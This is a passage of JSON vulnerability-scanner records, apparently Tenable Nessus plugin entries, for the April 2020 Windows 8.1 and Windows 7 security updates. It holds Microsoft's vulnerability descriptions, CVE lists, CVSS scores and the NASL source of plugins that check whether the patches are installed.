Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0945,\n CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4550970/windows-8-1-kb4550970\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4550961/windows-8-1-kb4550961\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4550970 or Cumulative Update KB4550961.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0992\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550961', '4550970');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550961, 4550970])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-18T21:08:45", "description": "The remote Windows host is missing security update 4550965\nor cumulative update 4550964. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)", "edition": 5, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-04-14T00:00:00", "title": "KB4550965: Windows 7 and Windows Server 2008 R2 April 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0967", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0959", "CVE-2020-0956", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0993", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-1000", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-0957", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-04-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550964.NASL", "href": "https://www.tenable.com/plugins/nessus/135472", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135472);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/17\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0938\",\n \"CVE-2020-0946\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0957\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0982\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1000\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"MSKB\", value:\"4550964\");\n script_xref(name:\"MSKB\", value:\"4550965\");\n script_xref(name:\"MSFT\", value:\"MS20-4550964\");\n script_xref(name:\"MSFT\", value:\"MS20-4550965\");\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n\n script_name(english:\"KB4550965: Windows 7 and Windows Server 2008 R2 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550965\nor cumulative update 4550964. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0957, CVE-2020-0958)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\");\n # https://support.microsoft.com/en-us/help/4550964/windows-7-update-kb4550964\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7c90e16d\");\n # https://support.microsoft.com/en-us/help/4550965/windows-7-update-kb4550965\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d52628ac\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4550965 or Cumulative Update KB4550964.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0992\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550964', '4550965');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550964, 4550965])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-07T09:28:26", "description": "The remote Windows host is missing security update 4550930.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the 